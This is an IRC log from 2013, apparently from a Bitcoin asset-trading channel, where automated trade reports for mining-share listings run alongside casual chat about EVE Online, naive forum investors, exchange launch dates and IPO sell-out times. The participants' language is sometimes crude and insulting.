[BTCTC] [ASICMINER-PT] 2 @ 4.33 = 8.66 BTC [-] Jul 30 18:15:15 [BTCTC] [ASICMINER-PT] 1 @ 4.306 BTC [-] Jul 30 18:15:18 heard of it Jul 30 18:15:30 [BTCTC] [ASICMINER-PT] 1 @ 4.305 BTC [-] Jul 30 18:15:31 yea i heard of it but i don't get the idea Jul 30 18:15:33 [BTCTC] [ASICMINER-PT] 1 @ 4.304 BTC [-] Jul 30 18:15:35 [BTCTC] [ASICMINER-PT] 1 @ 4.301 BTC [-] Jul 30 18:15:56 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 30 18:15:58 mircea_popescu: does eve run under wine? Jul 30 18:16:03 [BTCTC] [ASICMINER-PT] 2 @ 4.3 = 8.6 BTC [-] Jul 30 18:16:04 !t m S.BBET Jul 30 18:16:05 It connects both the grunts and the ships basically. It works side by side with Eve Jul 30 18:16:06 [MPEX:S.BBET] 1D: 0.00099999 / 0.00099999 / 0.00099999 (83 shares, 0.08 BTC), 7D: 0.00099999 / 0.00099999 / 0.00099999 (230 shares, 0.23 BTC), 30D: 0.0005505 / 0.00060182 / 0.00102899 (23482 shares, 14.13 BTC) Jul 30 18:16:29 [MPEX] [S.MPOE] 14750 @ 0.00080673 = 11.8993 BTC [-] Jul 30 18:16:31 [MPEX] [S.MPOE] 1300 @ 0.00080673 = 1.0487 BTC [-] Jul 30 18:16:46 [MPEX] [S.MPOE] 1600 @ 0.00080353 = 1.2856 BTC [-] Jul 30 18:17:09 jurov yup Jul 30 18:17:20 I really like it for taking the scale of Eve and making it seem even more immense Jul 30 18:19:31 [BTCTC] [ACTIVEMINING] 5 @ 0.008389 = 0.0419 BTC [-] Jul 30 18:19:32 [BTCTC] [ACTIVEMINING] 10 @ 0.008389 = 0.0839 BTC [-] Jul 30 18:20:33 i c Jul 30 18:22:12 [BTCTC] [ASICMINER-PT] 1 @ 4.373 BTC [+] Jul 30 18:22:14 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002574 BTC [-] Jul 30 18:22:48 this trailer points it out pretty good http://www.youtube.com/watch?v=TZYlI9UOC8Y Jul 30 18:22:57 [BTCTC] [ASICMINER-PT] 1 @ 4.374 BTC [+] Jul 30 18:23:00 [BTCTC] [ASICMINER-PT] 1 @ 4.374 BTC [+] Jul 30 18:23:21 its like you can control the console players, i.e. on which planet the action happens Jul 30 18:23:53 [BTCTC] [ASICMINER-PT] 1 @ 4.372 BTC [-] Jul 30 18:24:31 not really my cuppa. Jul 30 18:25:14 the fps, yea same here. but the concept is cool, the ccp guys have some good ideas Jul 30 18:25:22 [BTCTC] [ASICMINER-PT] 1 @ 4.374 BTC [+] Jul 30 18:25:24 [BTCTC] [TAT.MINIGAME] 20 @ 0.000319 = 0.0064 BTC [-] Jul 30 18:25:39 [BTCTC] [ASICMINER-PT] 1 @ 4.375 BTC [+] Jul 30 18:26:06 [BTCTC] [ASICMINER-PT] 2 @ 4.389 = 8.778 BTC [+] Jul 30 18:26:32 im just skilling atm, not actively playing Jul 30 18:27:06 What does it cost? a membership per month or how does it work? Jul 30 18:27:27 do you buy your ship upfront? Jul 30 18:27:30 [BTCTC] [ASICMINER-PT] 1 @ 4.374 BTC [-] Jul 30 18:28:05 [BTCTC] [ASICMINER-PT] 1 @ 4.389 BTC [+] Jul 30 18:28:20 it's free Jul 30 18:28:29 or which do you mean ? Jul 30 18:29:00 To play the game, do you pay per month Jul 30 18:30:38 to play eve it's like 10 bux a month buyt you can pay ingame currency too Jul 30 18:30:46 to play dust thingee it's free if you have a ps3 Jul 30 18:31:07 ah, no console play for me Jul 30 18:31:26 are you a dust fan mp? Jul 30 18:31:37 I have a some 7970s i could put to good use playing though Jul 30 18:31:48 i think dust is on pc too yeh? Jul 30 18:32:01 Just ps3 for now Jul 30 18:32:06 Saddens me Jul 30 18:32:24 VanCleef nope Jul 30 18:32:28 ahh okey, yeah my friend is really obsessed with it, heh always tries to get me ot play Jul 30 18:34:23 [BTCTC] [ACTIVEMINING] 122 @ 0.008377 = 1.022 BTC [-] Jul 30 18:35:16 its simmilar to planet side 2 Jul 30 18:35:18 or smth Jul 30 18:35:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.04231 BTC [-] Jul 30 18:35:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.04231 BTC [-] Jul 30 18:36:36 PS2 was quite enjoyable Jul 30 18:36:43 need to visual bitcoin trading better so itslike counterstrike office or something Jul 30 18:36:44 [BTCTC] [ACTIVEMINING] 28 @ 0.00837 = 0.2344 BTC [-] Jul 30 18:37:01 and i can just nadespam my way to 120$ Jul 30 18:37:18 heh Jul 30 18:37:32 lol Jul 30 18:37:41 You play CSS or CSGO? Jul 30 18:37:59 last i played was sauce Jul 30 18:38:13 yeh css Jul 30 18:38:43 [BTCTC] [TAT.MINIGAME] 1480 @ 0.000319 = 0.4721 BTC [-] Jul 30 18:39:27 [BTCTC] [BTC-BOND] 13 @ 0.009998 = 0.13 BTC [+] Jul 30 18:39:28 [BTCTC] [B.YABMC] 207 @ 0.002406 = 0.498 BTC [-] Jul 30 18:39:31 [BTCTC] [B.YABMC] 186 @ 0.002405 = 0.4473 BTC [-] Jul 30 18:39:34 [BTCTC] [B.YABMC] 3 @ 0.0024 = 0.0072 BTC [-] Jul 30 18:40:46 [HAVELOCK] [SDSTM] 7 @ 0.00820001 = 0.0574 BTC [+] Jul 30 18:40:55 [HAVELOCK] [AM100] 1 @ 0.0402 BTC [-] Jul 30 18:41:01 [BTCTC] [TAT.MINIGAME] 130 @ 0.000325 = 0.0423 BTC [+] Jul 30 18:41:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.04319 BTC [+] Jul 30 18:41:43 how do i chcek stats for something on btct Jul 30 18:42:02 check* Jul 30 18:42:44 [BTCTC] [ACTIVEMINING] 3 @ 0.008377 = 0.0251 BTC [+] Jul 30 18:43:08 [BTCTC] [ACTIVEMINING] 1 @ 0.008377 BTC [+] Jul 30 18:44:10 [BTCTC] [ACTIVEMINING] 82 @ 0.00837 = 0.6863 BTC [-] Jul 30 18:44:12 [BTCTC] [ACTIVEMINING] 26 @ 0.00837 = 0.2176 BTC [-] Jul 30 18:44:17 [BTCTC] [ACTIVEMINING] 25 @ 0.008377 = 0.2094 BTC [+] Jul 30 18:45:10 [HAVELOCK] [AM100] 4 @ 0.0402 = 0.1608 BTC [-] Jul 30 18:45:21 ;;ticker Jul 30 18:45:22 MtGox BTCUSD ticker | Best bid: 102.21000, Best ask: 102.44831, Bid-ask spread: 0.23831, Last trade: 102.44831, 24 hour volume: 15559.58430237, 24 hour low: 100.41000, 24 hour high: 103.00000, 24 hour vwap: 101.58085 Jul 30 18:45:34 [BTCTC] [ACTIVEMINING] 20 @ 0.0083 = 0.166 BTC [-] Jul 30 18:45:45 [HAVELOCK] [AM100] 2 @ 0.0402 = 0.0804 BTC [-] Jul 30 18:47:10 [BTCTC] [DMS.MINING] 15 @ 0.00925 = 0.1388 BTC [+] Jul 30 18:47:47 [BTCTC] [DMS.SELLING] 3 @ 0.02169 = 0.0651 BTC [+] Jul 30 18:47:48 [BTCTC] [DMS.SELLING] 3 @ 0.02169 = 0.0651 BTC [+] Jul 30 18:49:04 [BTCTC] [TAT.ASICMINER] 39 @ 0.04317 = 1.6836 BTC [-] Jul 30 18:49:26 [BTCTC] [TAT.ASICMINER] 84 @ 0.04317 = 3.6263 BTC [-] Jul 30 18:49:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.04318 = 0.2159 BTC [+] Jul 30 18:50:34 [BTCTC] [TAT.ASICMINER] 14 @ 0.04318 = 0.6045 BTC [+] Jul 30 18:52:11 [BTCTC] [TAT.MINIGAME] 159 @ 0.000325 = 0.0517 BTC [+] Jul 30 18:52:36 ;;baratio Jul 30 18:52:37 Total bids: 13530801 USD. Total asks: 89965 BTC. Ratio: 150.39990 USD/BTC. | Data vintage: 0.0098 seconds Jul 30 18:53:44 [BTCTC] [ACTIVEMINING] 25 @ 0.008107 = 0.2027 BTC [-] Jul 30 18:53:48 [BTCTC] [ACTIVEMINING] 50 @ 0.008106 = 0.4053 BTC [-] Jul 30 18:53:50 [BTCTC] [ACTIVEMINING] 131 @ 0.008105 = 1.0618 BTC [-] Jul 30 18:53:52 [BTCTC] [ACTIVEMINING] 203 @ 0.008104 = 1.6451 BTC [-] Jul 30 18:53:53 [BTCTC] [ACTIVEMINING] 200 @ 0.008102 = 1.6204 BTC [-] Jul 30 18:53:54 [BTCTC] [ACTIVEMINING] 350 @ 0.008089 = 2.8312 BTC [-] Jul 30 18:53:55 [BTCTC] [ACTIVEMINING] 700 @ 0.008088 = 5.6616 BTC [-] Jul 30 18:53:57 [BTCTC] [ACTIVEMINING] 150 @ 0.008085 = 1.2128 BTC [-] Jul 30 18:54:03 [BTCTC] [DMS.MINING] 3 @ 0.009887 = 0.0297 BTC [+] Jul 30 18:54:05 [BTCTC] [ACTIVEMINING] 100 @ 0.008084 = 0.8084 BTC [-] Jul 30 18:54:08 [BTCTC] [ACTIVEMINING] 100 @ 0.008083 = 0.8083 BTC [-] Jul 30 18:54:10 [BTCTC] [ACTIVEMINING] 100 @ 0.008081 = 0.8081 BTC [-] Jul 30 18:54:12 [BTCTC] [ACTIVEMINING] 10 @ 0.008074 = 0.0807 BTC [-] Jul 30 18:54:36 [BTCTC] [ACTIVEMINING] 20 @ 0.008073 = 0.1615 BTC [-] Jul 30 18:54:38 [BTCTC] [ACTIVEMINING] 177 @ 0.008031 = 1.4215 BTC [-] Jul 30 18:54:39 [BTCTC] [ACTIVEMINING] 355 @ 0.00803 = 2.8507 BTC [-] Jul 30 18:54:41 [BTCTC] [ACTIVEMINING] 100 @ 0.008001 = 0.8001 BTC [-] Jul 30 18:54:42 [BTCTC] [ACTIVEMINING] 200 @ 0.008 = 1.6 BTC [-] Jul 30 18:55:29 theyear20 around? Jul 30 18:55:40 your bro in the game yet? Jul 30 18:56:17 [BTCTC] [LTC-ATF.B2] 27 @ 0.01032 = 0.2786 BTC [+] Jul 30 18:56:20 [BTCTC] [LTC-ATF.B2] 27 @ 0.01032 = 0.2786 BTC [+] Jul 30 18:58:18 [BTCTC] [ACTIVEMINING] 25 @ 0.007711 = 0.1928 BTC [-] Jul 30 18:58:20 [BTCTC] [ACTIVEMINING] 12 @ 0.00771 = 0.0925 BTC [-] Jul 30 18:58:22 [BTCTC] [ACTIVEMINING] 50 @ 0.00771 = 0.3855 BTC [-] Jul 30 18:58:24 [BTCTC] [ACTIVEMINING] 222 @ 0.007701 = 1.7096 BTC [-] Jul 30 18:58:26 [BTCTC] [ACTIVEMINING] 191 @ 0.0077 = 1.4707 BTC [-] Jul 30 19:01:23 [BTCTC] [BFMINES] 15 @ 0.004 = 0.06 BTC [+] Jul 30 19:02:32 VanCleef: he is active in #bitfunder Jul 30 19:02:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.0425 BTC [-] Jul 30 19:03:46 [HAVELOCK] [SDSTM] 33 @ 0.00820001 = 0.2706 BTC [+] Jul 30 19:04:06 ahh, sorry wrong room :) Jul 30 19:04:17 [HAVELOCK] [SDSTM] 22 @ 0.0082 = 0.1804 BTC [-] Jul 30 19:05:16 [BTCTC] [ACTIVEMINING] 200 @ 0.007759 = 1.5518 BTC [+] Jul 30 19:05:28 mircea_popescu no one is running an isk <-> bitcoin exchange Jul 30 19:05:52 maybe you should make MPOE stock also redeemable for ISK? Jul 30 19:06:12 [HAVELOCK] [SMG] 54 @ 0.0002698 = 0.0146 BTC [-] Jul 30 19:06:23 [HAVELOCK] [SMG] 830 @ 0.00026999 = 0.2241 BTC [+] Jul 30 19:06:49 [HAVELOCK] [SMG] 750 @ 0.00027 = 0.2025 BTC [+] Jul 30 19:07:00 thestringpuller: it kind of is, isn't it? -> http://trilema.com/2013/bitcoins-eve-corporation/ Jul 30 19:07:20 [BTCTC] [TAT.VIRTUALMINE] 639 @ 0.002575 = 1.6454 BTC [+] Jul 30 19:07:22 [BTCTC] [TAT.VIRTUALMINE] 377 @ 0.002576 = 0.9712 BTC [+] Jul 30 19:08:23 [HAVELOCK] [AM100] 1 @ 0.0419 BTC [+] Jul 30 19:08:35 [BTCTC] [TAT.VIRTUALMINE] 358 @ 0.0027 = 0.9666 BTC [+] Jul 30 19:09:30 thestringpuller you can buy 1bitcoin stock for isk Jul 30 19:09:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00273 BTC [+] Jul 30 19:09:34 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00274 = 0.0055 BTC [+] Jul 30 19:09:36 [BTCTC] [TAT.VIRTUALMINE] 600 @ 0.00275 = 1.65 BTC [+] Jul 30 19:09:52 [BTCTC] [ACTIVEMINING] 1 @ 0.007764 BTC [+] Jul 30 19:10:42 [BTCTC] [TAT.VIRTUALMINE] 31 @ 0.00288 = 0.0893 BTC [+] Jul 30 19:11:41 [BTCTC] [ACTIVEMINING] 3 @ 0.00802 = 0.0241 BTC [+] Jul 30 19:12:07 [BTCTC] [ACTIVEMINING] 25 @ 0.007801 = 0.195 BTC [-] Jul 30 19:12:19 [BTCTC] [ACTIVEMINING] 50 @ 0.007801 = 0.3901 BTC [-] Jul 30 19:12:39 [BTCTC] [ACTIVEMINING] 185 @ 0.007801 = 1.4432 BTC [-] Jul 30 19:13:06 [BTCTC] [ACTIVEMINING] 23 @ 0.007801 = 0.1794 BTC [-] Jul 30 19:13:10 [BTCTC] [ACTIVEMINING] 1 @ 0.007801 BTC [-] Jul 30 19:13:32 [BTCTC] [RSM] 1 @ 0.0162 BTC [+] **** BEGIN LOGGING AT Wed Jul 31 03:07:58 2013 Jul 31 03:09:46 http://bitcoinmagazine.org/the-search-for-edwin-w-kelly/ Jul 31 03:09:48 The Search for Edwin W. Kelly | BitcoinMagazine.org Jul 31 03:09:49 the true bitcoin magazine Jul 31 03:11:39 [BTCTC] [ACTIVEMINING] 25 @ 0.007649 = 0.1912 BTC [-] Jul 31 03:11:41 [BTCTC] [ACTIVEMINING] 1000 @ 0.00765 = 7.65 BTC [+] Jul 31 03:11:43 [BTCTC] [ACTIVEMINING] 350 @ 0.007698 = 2.6943 BTC [+] Jul 31 03:13:01 [HAVELOCK] [SDSTM] 22 @ 0.00811 = 0.1784 BTC [+] Jul 31 03:16:50 [BTCTC] [ACTIVEMINING] 25 @ 0.007556 = 0.1889 BTC [-] Jul 31 03:16:52 [BTCTC] [ACTIVEMINING] 112 @ 0.007555 = 0.8462 BTC [-] Jul 31 03:16:54 [BTCTC] [ACTIVEMINING] 50 @ 0.007553 = 0.3777 BTC [-] Jul 31 03:16:56 [BTCTC] [ACTIVEMINING] 150 @ 0.00755 = 1.1325 BTC [-] Jul 31 03:16:57 [BTCTC] [ACTIVEMINING] 11 @ 0.007501 = 0.0825 BTC [-] Jul 31 03:16:59 [BTCTC] [ACTIVEMINING] 17 @ 0.0075 = 0.1275 BTC [-] Jul 31 03:17:01 [BTCTC] [ACTIVEMINING] 5 @ 0.0075 = 0.0375 BTC [-] Jul 31 03:17:14 [BTCTC] [ACTIVEMINING] 185 @ 0.007421 = 1.3729 BTC [-] Jul 31 03:17:15 [BTCTC] [ACTIVEMINING] 315 @ 0.00742 = 2.3373 BTC [-] Jul 31 03:17:19 "It's a wonder you manage to find the keyboard." - Pretty good one Jul 31 03:22:21 [BTCTC] [ACTIVEMINING] 25 @ 0.007481 = 0.187 BTC [+] Jul 31 03:24:46 [BTCTC] [ACTIVEMINING] 60 @ 0.0075 = 0.45 BTC [+] Jul 31 03:24:48 [BTCTC] [ACTIVEMINING] 119 @ 0.007481 = 0.8902 BTC [-] Jul 31 03:25:07 [BTCTC] [ACTIVEMINING] 60 @ 0.007481 = 0.4489 BTC [-] Jul 31 03:25:54 [BTCTC] [ACTIVEMINING] 60 @ 0.00755 = 0.453 BTC [+] Jul 31 03:26:22 [BTCTC] [ACTIVEMINING] 40 @ 0.00755 = 0.302 BTC [+] Jul 31 03:26:25 Quote from: mechs on July 25, 2013, 10:08:53 PM Just wondering what people think is currently the best semi-trustworthy investment out there? Jul 31 03:26:25 Quote from: pankkake on Today at 07:02:25 AM I hope your plan is to do the reverse of what Bitcointalk users will tell you. Jul 31 03:28:54 thestringpuller that guy's a miracle of modern science. Jul 31 03:29:05 Namworld that 2nd one is pretty good. Jul 31 03:29:40 some bitcointalk.org user: i think Actm was one of the best investments i made after losing nearly 50% of my holdings in Tat.virtualmine.. but right now its looking like a bubble.. prices have increased too high too fast.. i think after this phase of capitulation is over we can expect the prices to remain stable and start increasing once the avalon chips start hashing.. I think its a Jul 31 03:29:40 very ambitious undertaking and if done correctly can easily be Am 2.0 Jul 31 03:30:01 pankkake again: Yeah totally follow the investment advice of the guy who does not understand how TAT.VM works. This thread is why my avatar is now a facepalm, so I don't have to post it every time. Jul 31 03:31:12 mircea_popescu: more frighteningly the gist comments are even worse: "Very awesome idea. This should be in the roadmap somewhere. Is there any more documentation/resources to go along with this?", says one user. Jul 31 03:31:35 [BTCTC] [ACTIVEMINING] 150 @ 0.00755 = 1.1325 BTC [+] Jul 31 03:31:54 Keep up posting, pankkake. Jul 31 03:32:20 [BTCTC] [ACTIVEMINING] 1332 @ 0.00748 = 9.9634 BTC [-] Jul 31 03:32:31 Namworld: how much did you lose in virtualmine? Jul 31 03:32:48 [HAVELOCK] [SMG] 80 @ 0.0002699 = 0.0216 BTC [+] Jul 31 03:32:52 I didn't... I was quoting Jul 31 03:33:03 basically this is what you get when you don't make children work for their food and tell them wanting is good enough and ambition is somehow sufficient. Jul 31 03:33:06 see start of line "some bitcointalk.org user: " Jul 31 03:34:27 I see I misread that, my apologies. Jul 31 03:34:35 I'm not even good at all at trading, but just a little work thinking and investigating does wonder to get me massive ROI. Jul 31 03:34:53 That's because you're stealing from the stupid. Jul 31 03:34:53 ^ Jul 31 03:35:01 um my ^ was on Namworld Jul 31 03:35:02 's Jul 31 03:35:16 it's really not hard to do just fine in BTC. you just have to not follow the retards. Jul 31 03:35:28 [HAVELOCK] [AM100] 1 @ 0.041 BTC [+] Jul 31 03:35:35 I see many just buying anything blindly and dismissing naysayers because sometimes they hit good stuff. Jul 31 03:35:59 And see themselves as being good and intelligent. Jul 31 03:36:14 basically tjhe problem si this : guy gets a little btc dust somehiow, tries to find out wtf this is, gets real excited Jul 31 03:36:19 It's just reinforcement. Jul 31 03:36:24 at which point he maybe bvuys some and wants to see what can we do with this ? Jul 31 03:36:31 runs into forum, everything seems the same to him, all flat Jul 31 03:36:34 and so... lolz are born. Jul 31 03:37:39 "You know, much like the beta male that doesn.t dare propose to the hot chick all through highschool but instead spends his time and lunch money grooming her so she may better serve a better man later on." <- seems like an accurate description Jul 31 03:38:17 the nasty part is that we have absolutely no reason to bitch. free market ? this is it,. Jul 31 03:38:18 I'm not earning big time because I'm good at trading stocks. Not anywhere near a professional. I do so because the market is retarded. Jul 31 03:38:29 again, ^ Jul 31 03:38:30 professional level* Jul 31 03:38:41 [BTCTC] [BASIC-MINING] 1 @ 0.4998 BTC [-] Jul 31 03:39:20 are you smarter than a 4th grader? Jul 31 03:39:49 [BTCTC] [BASIC-MINING] 3 @ 0.4998 = 1.4994 BTC [-] Jul 31 03:39:50 [BTCTC] [BASIC-MINING] 1 @ 0.5 BTC [+] Jul 31 03:39:53 [BTCTC] [BASIC-MINING] 1 @ 0.5 BTC [+] Jul 31 03:39:54 Probably. Referring to that show? Jul 31 03:41:11 in general Jul 31 03:41:18 if you're smarter than a 4th grader, that means you're smarter than the BTC middle class? Jul 31 03:41:34 One would think so. Jul 31 03:42:00 thjere's not rly a middleclass left. Jul 31 03:42:07 or yet. or whicherer way Jul 31 03:42:12 How long has BitFunder been around? Jul 31 03:42:21 less than a year Jul 31 03:42:28 started in like November Jul 31 03:42:31 of 2012 Jul 31 03:42:44 Post GLBSE clusterfuck Jul 31 03:43:05 Seems like I performed well on BitFunder. But probably even better on BTCT.co Jul 31 03:43:25 Bitfunder has had a major scam though. Jul 31 03:43:27 That Ziggap Jul 31 03:44:34 I own 25% of ZigGap Jul 31 03:44:45 it's still listed? Jul 31 03:45:03 It's still there for those who have shares. Jul 31 03:45:13 I think it just gets frozen and hidden from market. Jul 31 03:45:28 I don't think BitFunder deletes removed assets, keeps the data. Jul 31 03:46:06 actually that's an interesting idea. Jul 31 03:46:23 anyone actually remember the birthdates of these ? bf was in november ? btct ? havelock ? Jul 31 03:46:33 [BTCTC] [ACTIVEMINING] 25 @ 0.007589 = 0.1897 BTC [+] Jul 31 03:46:35 [BTCTC] [ACTIVEMINING] 50 @ 0.00759 = 0.3795 BTC [+] Jul 31 03:46:49 you could probably use the wayback machine mircea_popescu Jul 31 03:47:18 actually that won't help Jul 31 03:48:01 [BTCTC] [ACTIVEMINING] 263 @ 0.007591 = 1.9964 BTC [+] Jul 31 03:48:08 use the bitcointalk.org threads of each exchange Jul 31 03:48:22 [BTCTC] [TAT.MINIGAME] 1 @ 0.000296 BTC [-] Jul 31 03:48:26 [BTCTC] [TAT.MINIGAME] 1200 @ 0.000295 = 0.354 BTC [-] Jul 31 03:48:45 mircea_popescu: http://www.networksolutions.com/whois/results.jsp?domain=bitfunder.com Jul 31 03:48:54 the domain was registered october 11th Jul 31 03:49:30 [BTCTC] [ACTIVEMINING] 25 @ 0.007482 = 0.1871 BTC [-] Jul 31 03:49:32 [BTCTC] [ACTIVEMINING] 69 @ 0.007481 = 0.5162 BTC [-] Jul 31 03:50:35 i think namworld's idea is best, use announcement threads. Jul 31 03:50:36 [BTCTC] [ACTIVEMINING] 368 @ 0.00748 = 2.7526 BTC [-] Jul 31 03:50:37 BTCTC.co was registered October 7th Jul 31 03:50:38 [BTCTC] [ACTIVEMINING] 200 @ 0.00745 = 1.49 BTC [-] Jul 31 03:50:41 [BTCTC] [ACTIVEMINING] 75 @ 0.00741 = 0.5558 BTC [-] Jul 31 03:50:42 [BTCTC] [ACTIVEMINING] 460 @ 0.007405 = 3.4063 BTC [-] Jul 31 03:50:45 [BTCTC] [ACTIVEMINING] 497 @ 0.007401 = 3.6783 BTC [-] Jul 31 03:52:33 [BTCTC] [DMS.MINING] 500 @ 0.009 = 4.5 BTC [-] Jul 31 03:53:48 The threads should be pretty representative of the "official" launch Jul 31 03:55:08 how quick do new ipos typically sell out? Jul 31 03:55:26 0.5 second Jul 31 03:55:27 kidkrypto depends on the ipo. bitbet ipo is still going, 6 months later. Jul 31 03:55:31 If it's on Havelock Jul 31 03:55:34 s.mg sold out in less than a day. Jul 31 03:55:55 ~1 day for other exchanges Jul 31 03:56:15 Not sure what's wrong with Havelock. I think the assets have a too small market cap. Jul 31 03:56:45 lets say labcoin and possibly btcgarden Jul 31 03:57:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.04319 BTC [+] Jul 31 03:58:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.04319 = 0.0864 BTC [+] Jul 31 03:58:15 when i say depends on the ipo i mean depends on the ipo, not depends on the underlying. Jul 31 03:58:18 these are distinct things. Jul 31 03:59:08 that makes sense Jul 31 03:59:44 [BTCTC] [TAT.MINIGAME] 100 @ 0.00033 = 0.033 BTC [+] Jul 31 03:59:48 only been involved for a week so i guess it's an obvious mistake to compare future ones to what i've seen with active the past week Jul 31 04:00:06 basically you can structure an ipo any way you want. depending on how it's structured it sells out faster or slower. Jul 31 04:00:14 you probably want to hit "a day or two" mark. Jul 31 04:00:41 don't assume a new issue is an IPO Jul 31 04:01:18 dub by now the i stands for internet. Jul 31 04:01:30 [BTCTC] [ACTIVEMINING] 25 @ 0.00741 = 0.1853 BTC [+] Jul 31 04:01:32 [BTCTC] [ACTIVEMINING] 12 @ 0.007409 = 0.0889 BTC [-] Jul 31 04:01:32 lol Jul 31 04:01:33 [BTCTC] [ACTIVEMINING] 50 @ 0.007407 = 0.3704 BTC [-] Jul 31 04:01:35 [BTCTC] [ACTIVEMINING] 953 @ 0.007401 = 7.0532 BTC [-] Jul 31 04:01:49 [BTCTC] [ACTIVEMINING] 25 @ 0.007401 = 0.185 BTC [-] Jul 31 04:02:13 what was that movie called... Jul 31 04:02:36 http://www.imdb.com/title/tt0181984/ Jul 31 04:02:41 Boiler Room (2000) - IMDb Jul 31 04:02:53 boiler room. should be mandatory viewing for anyone trtying to understand the play assets in btc. Jul 31 04:03:02 [HAVELOCK] [AM100] 1 @ 0.0411 BTC [+] Jul 31 04:03:23 [HAVELOCK] [AM1] 1 @ 4.6 BTC [+] Jul 31 04:03:30 that and http://www.imdb.com/title/tt0120669/ Jul 31 04:03:47 .t Jul 31 04:04:28 "A college dropout gets a job as a broker for a suburban investment firm, which puts him on the fast track to success, but the job might not be as legitimate as it sounds." Jul 31 04:04:29 [HAVELOCK] [AM100] 2 @ 0.0412 = 0.0824 BTC [+] Jul 31 04:04:30 [BTCTC] [ACTIVEMINING] 20 @ 0.0072 = 0.144 BTC [-] Jul 31 04:04:33 [HAVELOCK] [AM100] 2 @ 0.0413 = 0.0826 BTC [+] Jul 31 04:04:36 Why does that sounds just like me? Jul 31 04:04:36 [BTCTC] [ACTIVEMINING] 230 @ 0.00715 = 1.6445 BTC [-] Jul 31 04:04:38 [HAVELOCK] [AM100] 2 @ 0.0414 = 0.0828 BTC [+] Jul 31 04:04:41 [HAVELOCK] [AM100] 31 @ 0.04159999 = 1.2896 BTC [+] Jul 31 04:04:46 [BTCTC] [ACTIVEMINING] 270 @ 0.00715 = 1.9305 BTC [-] Jul 31 04:04:48 [HAVELOCK] [AM100] 1 @ 0.0416 BTC [+] Jul 31 04:04:50 [BTCTC] [ACTIVEMINING] 69 @ 0.00705 = 0.4865 BTC [-] Jul 31 04:04:52 [BTCTC] [ACTIVEMINING] 170 @ 0.007007 = 1.1912 BTC [-] Jul 31 04:04:53 [HAVELOCK] [AM100] 2 @ 0.0417 = 0.0834 BTC [+] Jul 31 04:04:54 [BTCTC] [ACTIVEMINING] 63 @ 0.007001 = 0.4411 BTC [-] Jul 31 04:04:57 [BTCTC] [ACTIVEMINING] 1 @ 0.007 BTC [-] Jul 31 04:04:57 [BTCTC] [ACTIVEMINING] 500 @ 0.007 = 3.5 BTC [-] Jul 31 04:04:59 [BTCTC] [ACTIVEMINING] 100 @ 0.007 = 0.7 BTC [-] Jul 31 04:05:00 [BTCTC] [ACTIVEMINING] 9700 @ 0.007 = 67.9 BTC [-] Jul 31 04:05:15 burn AMC burn Jul 31 04:05:56 [BTCTC] [ACTIVEMINING] 500 @ 0.00685 = 3.425 BTC [-] Jul 31 04:05:58 [BTCTC] [ACTIVEMINING] 200 @ 0.0068 = 1.36 BTC [-] Jul 31 04:06:00 [BTCTC] [ACTIVEMINING] 2 @ 0.006783 = 0.0136 BTC [-] Jul 31 04:06:02 [BTCTC] [ACTIVEMINING] 298 @ 0.006782 = 2.021 BTC [-] Jul 31 04:06:07 someone needs to parody that for this market Jul 31 04:06:10 dub fear and loathing requires reading skills. Jul 31 04:06:23 [BTCTC] [ACTIVEMINING] 1702 @ 0.006782 = 11.543 BTC [-] Jul 31 04:06:28 [BTCTC] [ACTIVEMINING] 441 @ 0.00678 = 2.99 BTC [-] Jul 31 04:06:29 [BTCTC] [ACTIVEMINING] 99 @ 0.00675 = 0.6683 BTC [-] Jul 31 04:06:30 how so? Jul 31 04:06:31 [BTCTC] [ACTIVEMINING] 50 @ 0.0067 = 0.335 BTC [-] Jul 31 04:06:44 dub cause i dunno wtf sense that film makes if you've not read the book. Jul 31 04:07:41 ythe book os required reading for sure Jul 31 04:07:54 [HAVELOCK] [AM100] 50 @ 0.04187998 = 2.094 BTC [+] Jul 31 04:08:04 [HAVELOCK] [AM100] 4 @ 0.04187998 = 0.1675 BTC [+] Jul 31 04:08:58 the film is a good primer for the state of mind of most captains of the bitfinance industry though Jul 31 04:11:52 http://www.youtube.com/watch?v=m6kFCNsnQpQ Jul 31 04:11:53 Fear and Loathing in Las Vegas (10/10) Movie CLIP - Too Much Adrenochrome (1998) HD - YouTube Jul 31 04:13:19 interstign fact, I read the book cover to cover on an acid trip once Jul 31 04:14:30 started on Leary's doors of perception but fuck that Jul 31 04:14:54 er Jul 31 04:14:58 huxley not leary Jul 31 04:15:37 [HAVELOCK] [SMG] 100 @ 0.0002551 = 0.0255 BTC [-] Jul 31 04:15:39 [HAVELOCK] [SMG] 390 @ 0.000255 = 0.0995 BTC [-] Jul 31 04:15:42 [HAVELOCK] [SMG] 123 @ 0.0002543 = 0.0313 BTC [-] Jul 31 04:15:44 [HAVELOCK] [SMG] 1018 @ 0.0002541 = 0.2587 BTC [-] Jul 31 04:15:46 [HAVELOCK] [SMG] 4022 @ 0.00025405 = 1.0218 BTC [-] Jul 31 04:15:59 [BTCTC] [ACTIVEMINING] 1 @ 0.007199 BTC [+] Jul 31 04:16:23 "796 Exchange IPO will sccess before Auguest 3rd 2013" Jul 31 04:16:31 i mean at least make an effort omg. Jul 31 04:16:51 dub i don't think they do drugs. Jul 31 04:17:00 [BTCTC] [ACTIVEMINING] 1 @ 0.006504 BTC [-] Jul 31 04:17:02 [BTCTC] [ACTIVEMINING] 767 @ 0.006503 = 4.9878 BTC [-] Jul 31 04:17:38 no? then their mothers surely did Jul 31 04:17:51 heavily and during gestation Jul 31 04:17:59 yeah. not quite cool enough for that sort of thing. Jul 31 04:18:07 just, boring people living on packaged cheese. Jul 31 04:23:23 [BTCTC] [ACTIVEMINING] 49 @ 0.006503 = 0.3186 BTC [-] Jul 31 04:23:34 [BTCTC] [ACTIVEMINING] 100 @ 0.006502 = 0.6502 BTC [-] Jul 31 04:23:36 [BTCTC] [ACTIVEMINING] 20 @ 0.0065 = 0.13 BTC [-] Jul 31 04:23:38 [BTCTC] [ACTIVEMINING] 155 @ 0.006411 = 0.9937 BTC [-] 